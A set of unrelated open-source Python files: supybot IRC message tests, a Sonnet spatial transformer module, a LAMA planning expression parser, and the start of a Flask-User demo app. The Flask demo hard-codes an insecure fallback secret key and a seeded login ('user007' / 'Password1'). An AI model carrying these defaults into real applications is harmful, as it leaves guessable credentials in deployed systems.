## self.assertRaises(AttributeError, setattr, msg, 'command', s)
## self.assertRaises(AttributeError, setattr, msg, 'args', t)
## if msg.args:
## def setArgs(msg):
## msg.args[0] = s
## self.assertRaises(TypeError, setArgs, msg)
def testInit(self):
for msg in msgs:
self.assertEqual(msg, ircmsgs.IrcMsg(prefix=msg.prefix,
command=msg.command,
args=msg.args))
self.assertEqual(msg, ircmsgs.IrcMsg(msg=msg))
self.assertRaises(ValueError,
ircmsgs.IrcMsg,
args=('foo', 'bar'),
prefix='foo!bar@baz')
def testPickleCopy(self):
for msg in msgs:
self.assertEqual(msg, pickle.loads(pickle.dumps(msg)))
self.assertEqual(msg, copy.copy(msg))
def testHashNotZero(self):
zeroes = 0
for msg in msgs:
if hash(msg) == 0:
zeroes += 1
self.failIf(zeroes > (len(msgs)/10), 'Too many zero hashes.')
def testMsgKeywordHandledProperly(self):
msg = ircmsgs.notice('foo', 'bar')
msg2 = ircmsgs.IrcMsg(msg=msg, command='PRIVMSG')
self.assertEqual(msg2.command, 'PRIVMSG')
self.assertEqual(msg2.args, msg.args)
def testMalformedIrcMsgRaised(self):
self.assertRaises(ircmsgs.MalformedIrcMsg, ircmsgs.IrcMsg, ':foo')
self.assertRaises(ircmsgs.MalformedIrcMsg, ircmsgs.IrcMsg,
args=('biff',), prefix='foo!bar@baz')
def testTags(self):
m = ircmsgs.privmsg('foo', 'bar')
self.failIf(m.repliedTo)
m.tag('repliedTo')
self.failUnless(m.repliedTo)
m.tag('repliedTo')
self.failUnless(m.repliedTo)
m.tag('repliedTo', 12)
self.assertEqual(m.repliedTo, 12)
class FunctionsTestCase(SupyTestCase):
def testIsAction(self):
L = [':[email protected] PRIVMSG'
' #sourcereview :ACTION does something',
':[email protected] PRIVMSG #sourcereview '
':ACTION beats angryman senseless with a Unix manual (#2)',
':[email protected] PRIVMSG #sourcereview '
':ACTION beats ang senseless with a 50lb Unix manual (#2)',
':[email protected] PRIVMSG #sourcereview '
':ACTION resizes angryman\'s terminal to 40x24 (#16)']
msgs = map(ircmsgs.IrcMsg, L)
for msg in msgs:
self.failUnless(ircmsgs.isAction(msg))
def testIsActionIsntStupid(self):
m = ircmsgs.privmsg('#x', '\x01NOTANACTION foo\x01')
self.failIf(ircmsgs.isAction(m))
m = ircmsgs.privmsg('#x', '\x01ACTION foo bar\x01')
self.failUnless(ircmsgs.isAction(m))
def testIsCtcp(self):
self.failUnless(ircmsgs.isCtcp(ircmsgs.privmsg('foo',
'\x01VERSION\x01')))
self.failIf(ircmsgs.isCtcp(ircmsgs.privmsg('foo', '\x01')))
def testIsActionFalseWhenNoSpaces(self):
msg = ircmsgs.IrcMsg('PRIVMSG #foo :\x01ACTIONfoobar\x01')
self.failIf(ircmsgs.isAction(msg))
def testUnAction(self):
s = 'foo bar baz'
msg = ircmsgs.action('#foo', s)
self.assertEqual(ircmsgs.unAction(msg), s)
def testBan(self):
channel = '#osu'
ban = '*!*@*.edu'
exception = '*!*@*ohio-state.edu'
noException = ircmsgs.ban(channel, ban)
self.assertEqual(ircutils.separateModes(noException.args[1:]),
[('+b', ban)])
withException = ircmsgs.ban(channel, ban, exception)
self.assertEqual(ircutils.separateModes(withException.args[1:]),
[('+b', ban), ('+e', exception)])
def testBans(self):
channel = '#osu'
bans = ['*!*@*', 'jemfinch!*@*']
exceptions = ['*!*@*ohio-state.edu']
noException = ircmsgs.bans(channel, bans)
self.assertEqual(ircutils.separateModes(noException.args[1:]),
[('+b', bans[0]), ('+b', bans[1])])
withExceptions = ircmsgs.bans(channel, bans, exceptions)
self.assertEqual(ircutils.separateModes(withExceptions.args[1:]),
[('+b', bans[0]), ('+b', bans[1]),
('+e', exceptions[0])])
def testUnban(self):
channel = '#supybot'
ban = 'foo!bar@baz'
self.assertEqual(str(ircmsgs.unban(channel, ban)),
'MODE %s -b :%s\r\n' % (channel, ban))
def testJoin(self):
channel = '#osu'
key = 'michiganSucks'
self.assertEqual(ircmsgs.join(channel).args, ('#osu',))
self.assertEqual(ircmsgs.join(channel, key).args,
('#osu', 'michiganSucks'))
def testJoins(self):
channels = ['#osu', '#umich']
keys = ['michiganSucks', 'osuSucks']
self.assertEqual(ircmsgs.joins(channels).args, ('#osu,#umich',))
self.assertEqual(ircmsgs.joins(channels, keys).args,
('#osu,#umich', 'michiganSucks,osuSucks'))
keys.pop()
self.assertEqual(ircmsgs.joins(channels, keys).args,
('#osu,#umich', 'michiganSucks'))
def testQuit(self):
self.failUnless(ircmsgs.quit(prefix='foo!bar@baz'))
def testOps(self):
m = ircmsgs.ops('#foo', ['foo', 'bar', 'baz'])
self.assertEqual(str(m), 'MODE #foo +ooo foo bar :baz\r\n')
def testDeops(self):
m = ircmsgs.deops('#foo', ['foo', 'bar', 'baz'])
self.assertEqual(str(m), 'MODE #foo -ooo foo bar :baz\r\n')
def testVoices(self):
m = ircmsgs.voices('#foo', ['foo', 'bar', 'baz'])
self.assertEqual(str(m), 'MODE #foo +vvv foo bar :baz\r\n')
def testDevoices(self):
m = ircmsgs.devoices('#foo', ['foo', 'bar', 'baz'])
self.assertEqual(str(m), 'MODE #foo -vvv foo bar :baz\r\n')
def testHalfops(self):
m = ircmsgs.halfops('#foo', ['foo', 'bar', 'baz'])
self.assertEqual(str(m), 'MODE #foo +hhh foo bar :baz\r\n')
def testDehalfops(self):
m = ircmsgs.dehalfops('#foo', ['foo', 'bar', 'baz'])
self.assertEqual(str(m), 'MODE #foo -hhh foo bar :baz\r\n')
def testMode(self):
m = ircmsgs.mode('#foo', ('-b', 'foo!bar@baz'))
s = str(m)
self.assertEqual(s, 'MODE #foo -b :foo!bar@baz\r\n')
def testIsSplit(self):
m = ircmsgs.IrcMsg(prefix="[email protected]",
command="QUIT",
args=('jupiter.oftc.net quasar.oftc.net',))
self.failUnless(ircmsgs.isSplit(m))
m = ircmsgs.IrcMsg(prefix="[email protected]",
command="QUIT",
args=('Read error: 110 (Connection timed out)',))
self.failIf(ircmsgs.isSplit(m))
m = ircmsgs.IrcMsg(prefix="[email protected]",
command="QUIT",
args=('"Bye!"',))
self.failIf(ircmsgs.isSplit(m))
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
| buildbot/supybot | test/test_ircmsgs.py | Python | bsd-3-clause | 10,535 |
# Copyright 2017 The Sonnet Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""""Implementation of Spatial Transformer networks core components."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
from itertools import chain
# Dependency imports
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from sonnet.python.modules import base
from sonnet.python.modules import basic
import tensorflow as tf
class GridWarper(base.AbstractModule):
"""Grid warper interface class.
An object implementing the `GridWarper` interface generates a reference grid
of feature points at construction time, and warps it via a parametric
transformation model, specified at run time by an input parameter Tensor.
Grid warpers must then implement a `create_features` function used to generate
the reference grid to be warped in the forward pass (according to a determined
warping model).
"""
def __init__(self, source_shape, output_shape, num_coeff, name, **kwargs):
"""Constructs a GridWarper module and initializes the source grid params.
`source_shape` and `output_shape` are used to define the size of the source
and output signal domains, as opposed to the shape of the respective
Tensors. For example, for an image of size `width=W` and `height=H`,
`{source,output}_shape=[H, W]`; for a volume of size `width=W`, `height=H`
and `depth=D`, `{source,output}_shape=[H, W, D]`.
Args:
source_shape: Iterable of integers determining the size of the source
signal domain.
output_shape: Iterable of integers determining the size of the destination
resampled signal domain.
num_coeff: Number of coefficients parametrizing the grid warp.
For example, a 2D affine transformation will be defined by the 6
parameters populating the corresponding 2x3 affine matrix.
name: Name of Module.
**kwargs: Extra kwargs to be forwarded to the `create_features` function,
instantiating the source grid parameters.
Raises:
Error: If `len(output_shape) > len(source_shape)`.
TypeError: If `output_shape` and `source_shape` are not both iterable.
"""
super(GridWarper, self).__init__(name=name)
self._source_shape = tuple(source_shape)
self._output_shape = tuple(output_shape)
if len(self._output_shape) > len(self._source_shape):
raise base.Error('Output domain dimensionality ({}) must be equal or '
'smaller than source domain dimensionality ({})'
.format(len(self._output_shape),
len(self._source_shape)))
self._num_coeff = num_coeff
self._psi = self._create_features(**kwargs)
@abc.abstractmethod
def _create_features(self, **kwargs):
"""Generates matrix of features, of size `[num_coeff, num_points]`."""
pass
@property
def n_coeff(self):
"""Returns number of coefficients of warping function."""
return self._n_coeff
@property
def psi(self):
"""Returns a list of features used to compute the grid warp."""
return self._psi
@property
def source_shape(self):
"""Returns a tuple containing the shape of the source signal."""
return self._source_shape
@property
def output_shape(self):
"""Returns a tuple containing the shape of the output grid."""
return self._output_shape
def _create_affine_features(output_shape, source_shape):
"""Generates n-dimensional homogenous coordinates for a given grid definition.
`source_shape` and `output_shape` are used to define the size of the source
and output signal domains, as opposed to the shape of the respective
Tensors. For example, for an image of size `width=W` and `height=H`,
`{source,output}_shape=[H, W]`; for a volume of size `width=W`, `height=H`
and `depth=D`, `{source,output}_shape=[H, W, D]`.
Args:
output_shape: Iterable of integers determining the shape of the grid to be
warped.
source_shape: Iterable of integers determining the domain of the signal to be
resampled.
Returns:
List of flattened numpy arrays of coordinates in range `[-1, 1]^N`, for
example:
```
[[x_0_0, .... , x_0_{n-1}],
....
[x_{M-1}_0, .... , x_{M-1}_{n-1}],
[x_{M}_0=0, .... , x_{M}_{n-1}=0],
...
[x_{N-1}_0=0, .... , x_{N-1}_{n-1}=0],
[1, ..., 1]]
```
where N is the dimensionality of the sampled space, M is the
dimensionality of the output space, i.e. 2 for images
and 3 for volumes, and n is the number of points in the output grid.
When the dimensionality of `output_shape` is smaller that that of
`source_shape` the last rows before [1, ..., 1] will be filled with 0.
"""
ranges = [np.linspace(-1, 1, x, dtype=np.float32)
for x in reversed(output_shape)]
psi = [x.reshape(-1) for x in np.meshgrid(*ranges, indexing='xy')]
dim_gap = len(source_shape) - len(output_shape)
for _ in xrange(dim_gap):
psi.append(np.zeros_like(psi[0], dtype=np.float32))
psi.append(np.ones_like(psi[0], dtype=np.float32))
return psi
class AffineGridWarper(GridWarper):
"""Affine Grid Warper class.
The affine grid warper generates a reference grid of n-dimensional points
and warps it via an affine transormation model determined by an input
parameter Tensor. Some of the transformation parameters can be fixed at
construction time via an `AffineWarpConstraints` object.
"""
def __init__(self,
source_shape,
output_shape,
constraints=None,
name='affine_grid_warper'):
"""Constructs an AffineGridWarper.
`source_shape` and `output_shape` are used to define the size of the source
and output signal domains, as opposed to the shape of the respective
Tensors. For example, for an image of size `width=W` and `height=H`,
`{source,output}_shape=[H, W]`; for a volume of size `width=W`, `height=H`
and `depth=D`, `{source,output}_shape=[H, W, D]`.
Args:
source_shape: Iterable of integers determining the size of the source
signal domain.
output_shape: Iterable of integers determining the size of the destination
resampled signal domain.
constraints: Either a double list of shape `[N, N+1]` defining constraints
on the entries of a matrix defining an affine transformation in N
dimensions, or an `AffineWarpConstraints` object. If the double list is
passed, a numeric value bakes in a constraint on the corresponding
entry in the tranformation matrix, whereas `None` implies that the
corresponding entry will be specified at run time.
name: Name of module.
Raises:
Error: If constraints fully define the affine transformation; or if
input grid shape and contraints have different dimensionality.
TypeError: If output_shape and source_shape are not both iterable.
"""
self._source_shape = tuple(source_shape)
self._output_shape = tuple(output_shape)
num_dim = len(source_shape)
if isinstance(constraints, AffineWarpConstraints):
self._constraints = constraints
elif constraints is None:
self._constraints = AffineWarpConstraints.no_constraints(num_dim)
else:
self._constraints = AffineWarpConstraints(constraints=constraints)
if self._constraints.num_free_params == 0:
raise base.Error('Transformation is fully constrained.')
if self._constraints.num_dim != num_dim:
raise base.Error('Incompatible set of constraints provided: '
'input grid shape and constraints have different '
'dimensionality.')
super(AffineGridWarper, self).__init__(source_shape=source_shape,
output_shape=output_shape,
num_coeff=6,
name=name,
constraints=self._constraints)
def _create_features(self, constraints):
"""Creates all the matrices needed to compute the output warped grids."""
affine_warp_constraints = constraints
if not isinstance(affine_warp_constraints, AffineWarpConstraints):
affine_warp_constraints = AffineWarpConstraints(affine_warp_constraints)
mask = affine_warp_constraints.mask
psi = _create_affine_features(output_shape=self._output_shape,
source_shape=self._source_shape)
scales = [(x - 1.0) * .5 for x in reversed(self._source_shape)]
offsets = scales
# Transforming a point x's i-th coordinate via an affine transformation
# is performed via the following dot product:
#
# x_i' = s_i * (T_i * x) + t_i (1)
#
# where Ti is the i-th row of an affine matrix, and the scalars s_i and t_i
# define a decentering and global scaling into the source space.
# In the AffineGridWarper some of the entries of Ti are provided via the
# input, some others are instead fixed, according to the constraints
# assigned in the constructor.
# In create_features the internal dot product (1) is accordingly broken down
# into two parts:
#
# x_i' = Ti[uncon_i] * x[uncon_i, :] + offset(con_var) (2)
#
# i.e. the sum of the dot product of the free parameters (coming
# from the input) indexed by uncond_i and an offset obtained by
# precomputing the fixed part of (1) according to the constraints.
# This step is implemented by analyzing row by row the constraints matrix
# and saving into a list the x[uncon_i] and offset(con_var) data matrices
# for each output dimension.
features = []
for row, scale in zip(mask, scales):
x_i = np.array([x for x, is_active in zip(psi, row) if is_active])
features.append(x_i * scale if len(x_i) else None)
for row_i, row in enumerate(mask):
x_i = None
s = scales[row_i]
for i, is_active in enumerate(row):
if is_active:
continue
# In principle a whole row of the affine matrix can be fully
# constrained. In that case the corresponding dot product between input
# parameters and grid coordinates doesn't need to be implemented in the
# computation graph since it can be precomputed.
# When a whole row if constrained, x_i - which is initialized to
# None - will still be None at the end do the loop when it is appended
# to the features list; this value is then used to detect this setup
# in the build function where the graph is assembled.
if x_i is None:
x_i = np.array(psi[i]) * affine_warp_constraints[row_i][i] * s
else:
x_i += np.array(psi[i]) * affine_warp_constraints[row_i][i] * s
features.append(x_i)
features += offsets
return features
def _build(self, inputs):
"""Assembles the module network and adds it to the graph.
The internal computation graph is assembled according to the set of
constraints provided at construction time.
Args:
inputs: Tensor containing a batch of transformation parameters.
Returns:
A batch of warped grids.
Raises:
Error: If the input tensor size is not consistent with the constraints
passed at construction time.
"""
input_shape = tf.shape(inputs)
input_dtype = inputs.dtype.as_numpy_dtype
batch_size = tf.expand_dims(input_shape[0], 0)
number_of_params = inputs.get_shape()[1]
if number_of_params != self._constraints.num_free_params:
raise base.Error('Input size is not consistent with constraint '
'definition: {} parameters expected, {} provided.'
.format(self._constraints.num_free_params,
number_of_params))
num_output_dimensions = len(self._psi) // 3
def get_input_slice(start, size):
"""Extracts a subset of columns from the input 2D Tensor."""
return basic.SliceByDim([1], [start], [size])(inputs)
warped_grid = []
var_index_offset = 0
number_of_points = np.prod(self._output_shape)
for i in xrange(num_output_dimensions):
if self._psi[i] is not None:
# The i-th output dimension is not fully specified by the constraints,
# the graph is setup to perform matrix multiplication in batch mode.
grid_coord = self._psi[i].astype(input_dtype)
num_active_vars = self._psi[i].shape[0]
active_vars = get_input_slice(var_index_offset, num_active_vars)
warped_coord = tf.matmul(active_vars, grid_coord)
warped_coord = tf.expand_dims(warped_coord, 1)
var_index_offset += num_active_vars
offset = self._psi[num_output_dimensions + i]
if offset is not None:
offset = offset.astype(input_dtype)
# Some entries in the i-th row of the affine matrix were constrained
# and the corresponding matrix multiplications have been precomputed.
tiling_params = tf.concat(
[
batch_size, tf.constant(
1, shape=(1,)), tf.ones_like(offset.shape)
],
0)
offset = offset.reshape((1, 1) + offset.shape)
warped_coord += tf.tile(offset, tiling_params)
else:
# The i-th output dimension is fully specified by the constraints, and
# the corresponding matrix multiplications have been precomputed.
warped_coord = self._psi[num_output_dimensions + i].astype(input_dtype)
tiling_params = tf.concat(
[
batch_size, tf.constant(
1, shape=(1,)), tf.ones_like(warped_coord.shape)
],
0)
warped_coord = warped_coord.reshape((1, 1) + warped_coord.shape)
warped_coord = tf.tile(warped_coord, tiling_params)
warped_coord += self._psi[i + 2 * num_output_dimensions]
# Need to help TF figuring out shape inference since tiling information
# is held in Tensors which are not known until run time.
warped_coord.set_shape([None, 1, number_of_points])
warped_grid.append(warped_coord)
# Reshape all the warped coordinates tensors to match the specified output
# shape and concatenate into a single matrix.
grid_shape = self._output_shape + (1,)
warped_grid = [basic.BatchReshape(grid_shape)(grid) for grid in warped_grid]
return tf.concat(warped_grid, len(grid_shape))
@property
def constraints(self):
return self._constraints
def inverse(self, name=None):
"""Returns a `sonnet` module to compute inverse affine transforms.
The function first assembles a network that given the constraints of the
current AffineGridWarper and a set of input parameters, retrieves the
coefficients of the corresponding inverse affine transform, then feeds its
output into a new AffineGridWarper setup to correctly warp the `output`
space into the `source` space.
Args:
name: Name of module implementing the inverse grid transformation.
Returns:
A `sonnet` module performing the inverse affine transform of a reference
grid of points via an AffineGridWarper module.
Raises:
tf.errors.UnimplementedError: If the function is called on a non 2D
instance of AffineGridWarper.
"""
if self._num_coeff != 6:
raise tf.errors.UnimplementedError('AffineGridWarper currently supports'
'inversion only for the 2D case.')
def _affine_grid_warper_inverse(inputs):
"""Assembles network to compute inverse affine transformation.
Each `inputs` row potentailly contains [a, b, tx, c, d, ty]
corresponding to an affine matrix:
A = [a, b, tx],
[c, d, ty]
We want to generate a tensor containing the coefficients of the
corresponding inverse affine transformation in a constraints-aware
fashion.
Calling M:
M = [a, b]
[c, d]
the affine matrix for the inverse transform is:
A_in = [M^(-1), M^-1 * [-tx, -tx]^T]
where
M^(-1) = (ad - bc)^(-1) * [ d, -b]
[-c, a]
Args:
inputs: Tensor containing a batch of transformation parameters.
Returns:
A tensorflow graph performing the inverse affine transformation
parametrized by the input coefficients.
"""
batch_size = tf.expand_dims(tf.shape(inputs)[0], 0)
constant_shape = tf.concat([batch_size, tf.convert_to_tensor((1,))], 0)
index = iter(range(6))
def get_variable(constraint):
if constraint is None:
i = next(index)
return inputs[:, i:i+1]
else:
return tf.fill(constant_shape, tf.constant(constraint,
dtype=inputs.dtype))
constraints = chain.from_iterable(self.constraints)
a, b, tx, c, d, ty = (get_variable(constr) for constr in constraints)
det = a * d - b * c
a_inv = d / det
b_inv = -b / det
c_inv = -c / det
d_inv = a / det
m_inv = basic.BatchReshape(
[2, 2])(tf.concat([a_inv, b_inv, c_inv, d_inv], 1))
txy = tf.expand_dims(tf.concat([tx, ty], 1), 2)
txy_inv = basic.BatchFlatten()(tf.matmul(m_inv, txy))
tx_inv = txy_inv[:, 0:1]
ty_inv = txy_inv[:, 1:2]
inverse_gw_inputs = tf.concat(
[a_inv, b_inv, -tx_inv, c_inv, d_inv, -ty_inv], 1)
agw = AffineGridWarper(self.output_shape,
self.source_shape)
return agw(inverse_gw_inputs) # pylint: disable=not-callable
if name is None:
name = self.module_name + '_inverse'
return base.Module(_affine_grid_warper_inverse, name=name)
class AffineWarpConstraints(object):
"""Affine warp contraints class.
`AffineWarpConstraints` allow for very succinct definitions of constraints on
the values of entries in affine transform matrices.
"""
def __init__(self, constraints=((None,) * 3,) * 2):
"""Creates a constraint definition for an affine transformation.
Args:
constraints: A doubly-nested iterable of shape `[N, N+1]` defining
constraints on the entries of a matrix that represents an affine
transformation in `N` dimensions. A numeric value bakes in a constraint
on the corresponding entry in the tranformation matrix, whereas `None`
implies that the corresponding entry will be specified at run time.
Raises:
TypeError: If `constraints` is not a nested iterable.
ValueError: If the double iterable `constraints` has inconsistent
dimensions.
"""
try:
self._constraints = tuple(tuple(x) for x in constraints)
except TypeError:
raise TypeError('constraints must be a nested iterable.')
# Number of rows
self._num_dim = len(self._constraints)
expected_num_cols = self._num_dim + 1
if any(len(x) != expected_num_cols for x in self._constraints):
raise ValueError('The input list must define a Nx(N+1) matrix of '
'contraints.')
def _calc_mask(self):
"""Computes a boolean mask from the user defined constraints."""
mask = []
for row in self._constraints:
mask.append(tuple(x is None for x in row))
return tuple(mask)
def _calc_num_free_params(self):
"""Computes number of non constrained parameters."""
return sum(row.count(None) for row in self._constraints)
@property
def num_free_params(self):
return self._calc_num_free_params()
@property
def mask(self):
return self._calc_mask()
@property
def constraints(self):
return self._constraints
@property
def num_dim(self):
return self._num_dim
def __getitem__(self, i):
"""Returns the list of constraints for the i-th row of the affine matrix."""
return self._constraints[i]
def _combine(self, x, y):
"""Combines two constraints, raising an error if they are not compatible."""
if x is None or y is None:
return x or y
if x != y:
raise ValueError('Incompatible set of constraints provided.')
return x
def __and__(self, rhs):
"""Combines two sets of constraints into a coherent single set."""
return self.combine_with(rhs)
def combine_with(self, additional_constraints):
"""Combines two sets of constraints into a coherent single set."""
x = additional_constraints
if not isinstance(additional_constraints, AffineWarpConstraints):
x = AffineWarpConstraints(additional_constraints)
new_constraints = []
for left, right in zip(self._constraints, x.constraints):
new_constraints.append([self._combine(x, y) for x, y in zip(left, right)])
return AffineWarpConstraints(new_constraints)
# Collection of utlities to initialize an AffineGridWarper in 2D and 3D.
@classmethod
def no_constraints(cls, num_dim=2):
"""Empty set of constraints for a num_dim-ensional affine transform."""
return cls(((None,) * (num_dim + 1),) * num_dim)
@classmethod
def translation_2d(cls, x=None, y=None):
"""Assign contraints on translation components of affine transform in 2d."""
return cls([[None, None, x],
[None, None, y]])
@classmethod
def translation_3d(cls, x=None, y=None, z=None):
"""Assign contraints on translation components of affine transform in 3d."""
return cls([[None, None, None, x],
[None, None, None, y],
[None, None, None, z]])
@classmethod
def scale_2d(cls, x=None, y=None):
"""Assigns contraints on scaling components of affine transform in 2d."""
return cls([[x, None, None],
[None, y, None]])
@classmethod
def scale_3d(cls, x=None, y=None, z=None):
"""Assigns contraints on scaling components of affine transform in 3d."""
return cls([[x, None, None, None],
[None, y, None, None],
[None, None, z, None]])
@classmethod
def shear_2d(cls, x=None, y=None):
"""Assigns contraints on shear components of affine transform in 2d."""
return cls([[None, x, None],
[y, None, None]])
@classmethod
def no_shear_2d(cls):
return cls.shear_2d(x=0, y=0)
@classmethod
def no_shear_3d(cls):
"""Assigns contraints on shear components of affine transform in 3d."""
return cls([[None, 0, 0, None],
[0, None, 0, None],
[0, 0, None, None]])
| mumuwoyou/vnpy-master | sonnet/python/modules/spatial_transformer.py | Python | mit | 23,304 |
#######################################################################
#
# Author: Gabi Roeger
# Modified by: Silvia Richter ([email protected])
# (C) Copyright 2008: Gabi Roeger and NICTA
#
# This file is part of LAMA.
#
# LAMA is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the license, or (at your option) any later version.
#
# LAMA is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
#
#######################################################################
import string
import conditions
def parse_expression(exp):
if isinstance(exp, list):
functionsymbol = exp[0]
return PrimitiveNumericExpression(functionsymbol,
[conditions.parse_term(arg) for arg in exp[1:]])
elif exp.replace(".","").isdigit():
return NumericConstant(string.atof(exp))
else:
return PrimitiveNumericExpression(exp,[])
def parse_assignment(alist):
assert len(alist) == 3
op = alist[0]
head = parse_expression(alist[1])
exp = parse_expression(alist[2])
if op == "=":
return Assign(head, exp)
elif op == "increase":
return Increase(head, exp)
else:
assert False, "Assignment operator not supported."
class FunctionalExpression(object):
def __init__(self, parts):
self.parts = tuple(parts)
def dump(self, indent=" "):
print "%s%s" % (indent, self._dump())
for part in self.parts:
part.dump(indent + " ")
def _dump(self):
return self.__class__.__name__
def instantiate(self, var_mapping, init_facts):
raise ValueError("Cannot instantiate condition: not normalized")
class NumericConstant(FunctionalExpression):
parts = ()
def __init__(self, value):
self.value = value
def __eq__(self, other):
return (self.__class__ == other.__class__ and self.value == other.value)
def __str__(self):
return "%s %s" % (self.__class__.__name__, self.value)
def _dump(self):
return str(self)
def instantiate(self, var_mapping, init_facts):
return self
class PrimitiveNumericExpression(FunctionalExpression):
parts = ()
def __init__(self, symbol, args):
self.symbol = symbol
self.args = tuple(args)
def __eq__(self, other):
if not (self.__class__ == other.__class__ and self.symbol == other.symbol
and len(self.args) == len(other.args)):
return False
else:
for s,o in zip(self.args, other.args):
if not s == o:
return False
return True
def __str__(self):
return "%s %s(%s)" % ("PNE", self.symbol, ", ".join(map(str, self.args)))
def dump(self, indent=" "):
print "%s%s" % (indent, self._dump())
for arg in self.args:
arg.dump(indent + " ")
def _dump(self):
return str(self)
def instantiate(self, var_mapping, init_facts):
args = [conditions.ObjectTerm(var_mapping.get(arg.name, arg.name)) for arg in self.args]
pne = PrimitiveNumericExpression(self.symbol, args)
assert not self.symbol == "total-cost"
# We know this expression is constant. Substitute it by corresponding
# initialization from task.
for fact in init_facts:
if isinstance(fact, FunctionAssignment):
if fact.fluent == pne:
return fact.expression
assert False, "Could not find instantiation for PNE!"
class FunctionAssignment(object):
def __init__(self, fluent, expression):
self.fluent = fluent
self.expression = expression
def __str__(self):
return "%s %s %s" % (self.__class__.__name__, self.fluent, self.expression)
def dump(self, indent=" "):
print "%s%s" % (indent, self._dump())
self.fluent.dump(indent + " ")
self.expression.dump(indent + " ")
def _dump(self):
return self.__class__.__name__
def instantiate(self, var_mapping, init_facts):
if not (isinstance(self.expression, PrimitiveNumericExpression) or
isinstance(self.expression, NumericConstant)):
raise ValueError("Cannot instantiate assignment: not normalized")
# We know that this assignment is a cost effect of an action (for initial state
# assignments, "instantiate" is not called). Hence, we know that the fluent is
# the 0-ary "total-cost" which does not need to be instantiated
assert self.fluent.symbol == "total-cost"
fluent = self.fluent
expression = self.expression.instantiate(var_mapping, init_facts)
return self.__class__(fluent, expression)
class Assign(FunctionAssignment):
def __str__(self):
return "%s := %s" % (self.fluent, self.expression)
class Increase(FunctionAssignment):
pass
| PlanTool/plantool | wrappingPlanners/Deterministic/LAMA/seq-sat-lama/lama/translate/pddl/f_expression.py | Python | gpl-2.0 | 5,321 |
import os
from flask import Flask, render_template_string, request
from flask_mail import Mail
from flask_sqlalchemy import SQLAlchemy
from flask_user import login_required, SQLAlchemyAdapter, UserManager, UserMixin
from flask_user import roles_required
# Use a Class-based config to avoid needing a 2nd file
# os.getenv() enables configuration through OS environment variables
class ConfigClass(object):
# Flask settings
SECRET_KEY = os.getenv('SECRET_KEY', 'THIS IS AN INSECURE SECRET')
SQLALCHEMY_DATABASE_URI = os.getenv('DATABASE_URL', 'sqlite:///single_file_app.sqlite')
CSRF_ENABLED = True
# Flask-Mail settings
MAIL_USERNAME = os.getenv('MAIL_USERNAME', '[email protected]')
MAIL_PASSWORD = os.getenv('MAIL_PASSWORD', 'password')
MAIL_DEFAULT_SENDER = os.getenv('MAIL_DEFAULT_SENDER', '"MyApp" <[email protected]>')
MAIL_SERVER = os.getenv('MAIL_SERVER', 'smtp.gmail.com')
MAIL_PORT = int(os.getenv('MAIL_PORT', '465'))
MAIL_USE_SSL = int(os.getenv('MAIL_USE_SSL', True))
# Flask-User settings
USER_APP_NAME = "AppName" # Used by email templates
def create_app(test_config=None): # For automated tests
# Setup Flask and read config from ConfigClass defined above
app = Flask(__name__)
app.config.from_object(__name__+'.ConfigClass')
# Load local_settings.py if file exists # For automated tests
try: app.config.from_object('local_settings')
except: pass
# Load optional test_config # For automated tests
if test_config:
app.config.update(test_config)
# Initialize Flask extensions
mail = Mail(app) # Initialize Flask-Mail
db = SQLAlchemy(app) # Initialize Flask-SQLAlchemy
# Define the User data model. Make sure to add flask.ext.user UserMixin!!
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
# User email information
email = db.Column(db.String(255), nullable=False, unique=True)
confirmed_at = db.Column(db.DateTime())
# User information
active = db.Column('is_active', db.Boolean(), nullable=False, server_default='0')
first_name = db.Column(db.String(100), nullable=False, server_default='')
last_name = db.Column(db.String(100), nullable=False, server_default='')
# Relationships
user_auth = db.relationship('UserAuth', uselist=False)
roles = db.relationship('Role', secondary='user_roles',
backref=db.backref('users', lazy='dynamic'))
# Define the UserAuth data model.
class UserAuth(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer(), db.ForeignKey('user.id', ondelete='CASCADE'))
# User authentication information
username = db.Column(db.String(50), nullable=False, unique=True)
password = db.Column(db.String(255), nullable=False, server_default='')
reset_password_token = db.Column(db.String(100), nullable=False, server_default='')
# Relationships
user = db.relationship('User', uselist=False)
# Define the Role data model
class Role(db.Model):
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(50), unique=True)
# Define the UserRoles data model
class UserRoles(db.Model):
id = db.Column(db.Integer(), primary_key=True)
user_id = db.Column(db.Integer(), db.ForeignKey('user.id', ondelete='CASCADE'))
role_id = db.Column(db.Integer(), db.ForeignKey('role.id', ondelete='CASCADE'))
# Reset all the database tables
db.create_all()
# Setup Flask-User
db_adapter = SQLAlchemyAdapter(db, User, UserAuthClass=UserAuth)
user_manager = UserManager(db_adapter, app)
# Create 'user007' user with 'secret' and 'agent' roles
if not UserAuth.query.filter(UserAuth.username=='user007').first():
user1 = User(email='[email protected]', first_name='James', last_name='Bond', active=True)
db.session.add(user1)
user_auth1 = UserAuth(user=user1, username='user007',
password=user_manager.hash_password('Password1')
)
db.session.add(user_auth1)
user1.roles.append(Role(name='secret'))
user1.roles.append(Role(name='agent'))
db.session.commit()
# The Home page is accessible to anyone
@app.route('/')
def home_page():
return render_template_string("""
{% extends "base.html" %}
{% block content %}
<h2>Home page</h2>
<p>This page can be accessed by anyone.</p><br/>
<p><a href={{ url_for('home_page') }}>Home page</a> (anyone)</p>
<p><a href={{ url_for('members_page') }}>Members page</a> (login required)</p>
<p><a href={{ url_for('special_page') }}>Special page</a> (login with username 'user007' and password 'Password1')</p>
{% endblock %}
